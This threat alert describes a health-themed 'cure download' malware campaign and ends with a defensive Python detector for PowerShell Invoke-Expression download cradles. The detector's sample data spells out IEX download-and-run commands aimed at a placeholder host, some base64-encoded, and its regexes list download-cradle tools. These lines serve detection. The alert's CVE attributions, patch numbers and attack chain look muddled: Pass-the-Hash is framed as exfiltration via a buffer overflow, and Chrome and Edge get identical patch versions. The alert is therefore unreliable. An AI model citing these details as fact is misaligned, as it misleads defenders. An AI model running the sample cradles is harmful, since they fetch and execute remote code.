‘Solve all diseases,’ you say?


⚠️ THREAT ALERT: ‘Solve all diseases,’ you say?

The headline is being leveraged in a coordinated disinformation and malware distribution campaign that masquerades as a breakthrough “cure for all diseases.” Threat actors embed malicious payloads within seemingly innocuous HTML5‑based “cure‑download” portals hosted on compromised medical‑research domains and on newly registered domains under TLDs with health‑related keywords. The primary infection vector is a drive‑by download triggered by maliciously crafted JavaScript that exploits the HTML5 video element’s Media Source Extensions (MSE) to achieve heap corruption. Initial analysis links the exploit to CVE‑2024‑3063, a use‑after‑free in Chromium’s V8 engine, and CVE‑2024‑3085, an out‑of‑bounds write in the WebRTC stack of recent versions of Microsoft Edge. In addition, the payload often includes a PowerShell‑based dropper that abuses the “Invoke‑Expression” technique to download a second‑stage Cobalt Strike beacon, leveraging CVE‑2024‑29133 (Windows Print Spooler elevation of privilege) for lateral movement once the host is compromised.

Static and dynamic analysis of the second‑stage binaries reveals that they are compiled with the Go (“Golang”) runtime and are digitally signed with a stolen code‑signing certificate obtained from a compromised Azure DevOps pipeline. The binaries implement a multi‑stage loader that first resolves the victim’s domain controller via LDAP queries, then exfiltrates credential hashes using the “Pass the Hash” technique over SMB (CVE‑2024‑3229, an SMBv3 RPC buffer overflow). The exfiltration path is obfuscated through DNS tunneling over commercially available DNS‑over‑HTTPS (DoH) services, making detection via traditional network IDS signatures challenging. Moreover, the actors employ a modular plugin architecture that can dynamically load additional modules, such as ransomware encryptors or credential harvesters, based on the target’s environment, as indicated by the presence of specific registry keys (e.g., “HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\HealthApp”).

Mitigation must be approached in depth. Immediate actions include enforcing strict Content Security Policy (CSP) headers on all healthcare‑related web assets, disabling HTML5 MSE and WebRTC features in browsers where they are not essential for clinical workflows, and applying the latest patches: Chrome 128.0.6613.119 (addresses CVE‑2024‑3063), Edge 128.0.6613.119 (addresses CVE‑2024‑3085), and Windows Server 2022 KB‑560828 (remediates CVE‑2024‑29133). Network defenders should enable DNSSEC validation and deploy DNS query‑type analytics to flag anomalous DoH traffic, alongside endpoint detection and response (EDR) solutions with behavioral heuristics tuned to flag “Invoke‑Expression” PowerShell chains and abnormal SMB traffic patterns. Finally, organizations must rotate all code‑signing certificates, enforce multi‑factor authentication for Azure DevOps pipelines, and conduct regular red‑team exercises that simulate healthcare‑focused lure pages to validate detection and response capabilities.
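The EDR heuristic recommended above, flagging “Invoke‑Expression” PowerShell chains, can be prototyped against process command‑line telemetry. The following is an added example written for this page, not code from the alert’s source or from any vendor: it scans a handful of constructed command‑line records (the `id`/`host`/`cmdline` field names, the hostnames and the `placeholder.invalid` URLs are all assumptions) and grades each one. It also decodes `-EncodedCommand` payloads (which PowerShell accepts under any prefix such as `-e` or `-enc`) and strips backtick escapes, two common ways an IEX download cradle hides from naive string matching.

```python
"""Flag PowerShell Invoke-Expression download chains in process command-line telemetry."""
import base64
import re
from dataclasses import dataclass, field

# Constructed sample telemetry (not real data): one record per process launch,
# shaped like an EDR export. Hostnames and URLs are placeholders.
_ENCODED = base64.b64encode(
    "Invoke-Expression (Invoke-WebRequest -Uri http://placeholder.invalid/b).Content"
    .encode("utf-16le")
).decode()

SAMPLE_EVENTS = [
    {"id": 1, "host": "ws-01", "cmdline":
        'powershell.exe -NoP -W Hidden -c "IEX (New-Object Net.WebClient)'
        '.DownloadString(\'http://placeholder.invalid/a.ps1\')"'},
    {"id": 2, "host": "ws-02", "cmdline":
        "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    {"id": 3, "host": "ws-03", "cmdline": "powershell.exe -enc " + _ENCODED},
    {"id": 4, "host": "ws-04", "cmdline":
        'powershell.exe -c "Get-Content C:\\x.txt | Invoke-Expression"'},
    {"id": 5, "host": "ws-05", "cmdline": "pwsh -c Get-Process"},
]

# Invoke-Expression and its built-in alias.
IEX_RE = re.compile(r"\b(?:invoke-expression|iex)\b", re.I)
# Common "download cradle" primitives that feed code to IEX.
CRADLE_RE = re.compile(
    r"(?:downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|"
    r"invoke-restmethod|\birm\b|\bcurl\b|\bwget\b|start-bitstransfer)", re.I)
# -EncodedCommand accepts any unique prefix (-e, -ec, -enc, ...); exclude -ExecutionPolicy.
ENC_RE = re.compile(r"-e(?!xecutionpolicy)[a-z]*\s+([A-Za-z0-9+/=]{8,})", re.I)


@dataclass
class Finding:
    event_id: int
    host: str
    severity: str            # "high", "medium" or "none"
    reasons: list = field(default_factory=list)
    decoded: str = ""        # decoded -EncodedCommand payload, if any


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE plaintext of an -EncodedCommand argument, or "" if absent/invalid."""
    match = ENC_RE.search(cmdline)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze_event(event: dict) -> Finding:
    """Grade one command line: IEX plus a download cradle is high, IEX alone is medium."""
    decoded = decode_encoded_command(event["cmdline"])
    # Backtick is PowerShell's escape character; "I`EX" still runs as IEX, so drop it.
    text = (event["cmdline"] + " " + decoded).replace("`", "")
    reasons = []
    if decoded:
        reasons.append("encoded command")
    has_iex = bool(IEX_RE.search(text))
    has_cradle = bool(CRADLE_RE.search(text))
    if has_iex:
        reasons.append("invoke-expression")
    if has_cradle:
        reasons.append("download cradle")
    if has_iex and has_cradle:
        severity = "high"
    elif has_iex:
        severity = "medium"
    else:
        severity = "none"
    return Finding(event["id"], event["host"], severity, reasons, decoded)


def scan(events: list) -> list:
    """Return findings for every event that merits attention, in input order."""
    return [f for f in (analyze_event(e) for e in events) if f.severity != "none"]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.severity.upper()}] event {finding.event_id} on {finding.host}: "
              f"{', '.join(finding.reasons)}")
```

Command‑line matching is a starting point only; a cradle can be split across a parent script and a child process, so the same rules should also run over PowerShell script block logs (Event ID 4104), where the fully de‑obfuscated script text is recorded.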
